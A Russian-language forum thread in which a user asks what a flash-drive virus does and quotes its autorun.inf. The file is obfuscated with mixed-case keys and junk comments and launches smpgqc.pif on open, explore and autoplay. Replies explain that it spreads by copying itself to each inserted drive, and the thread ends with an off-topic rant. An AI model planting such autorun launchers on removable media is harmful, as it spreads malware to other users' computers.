что делает этот вирус?

[DEM¤N]

что делает этот вирус?

Подцепил где-то вирус активизирующийся при попытке обращения к флешке (smpgqc.pif, имя файла наверное случайное т.к. гугл аналогов не нашел). Стоит обновленный NOD32 4.0, не видит его. Обнаружил фаерволом невидимый файл (как вирус успел поменять настройки эксплорера без разрешения я так и не понял), там лежал autorun.inf

[AutoRun]

;
Shell\open\dEfAuLt=1

;
opEN= smpgqc.pif
;hQYb
shell\OPEn\command =smpgqc.pif
;QiiDoTNbopdiXmp 
SHEll\eXpLOre\CommAND = smpgqc.pif
;oQko 
shELl\AUToplAY\cOmMand= smpgqc.pif

;amXhjd RuAo ditWtVroRq tvFYDvmEWR sneB

и файл-ярлык для старых версий виндоус\дос smpgqc.pif.

Расскажите кто-нибудь что здесь зашифровано. Я так понял что для дешифровки нужен pif-файл, если кому-то интересно - могу поделиться. Просто очень любопытно как он работает.

 

[generatorglukoff]

Обнаружил фаерволом невидимый файл

фаерволом файлы смотрим, а фотоаппаратом на ХФ ходим?

(как вирус успел поменять настройки эксплорера без разрешения я так и не понял),

использование ыксплорера должно анально караться!

там лежал autorun.inf

смысл которого состоит в том, чтобы запускать pif-файл при открытии каталога в ыксплорере.

Расскажите кто-нибудь что здесь зашифровано. Я так понял что для дешифровки нужен pif-файл, если кому-то интересно - могу поделиться. Просто очень любопытно как он работает.

на каждый всунутый девайс создает autorun.inf и файлик. так и размножается. в деструктивных действиях вроде замечен не был. не умеет размножаться, если на флешки есть каталог autorun.inf

 

[sv19com]

А кто сказал что это вирус???
Немножко криво автор какой-то проги сделал автозапуск...

А как работает читай здесь: https://ru.wikipedia.org/wiki/Оболочка_операционной_системы

 

[mikepit81]

DEM¤N, он медленно выедает твой моск

 

[Тыемураз]

Нам не нужны слабовольные перди,нам нужна сильная и справедливая логика,основанная на всестороннем познании того,с чем работает наш народ .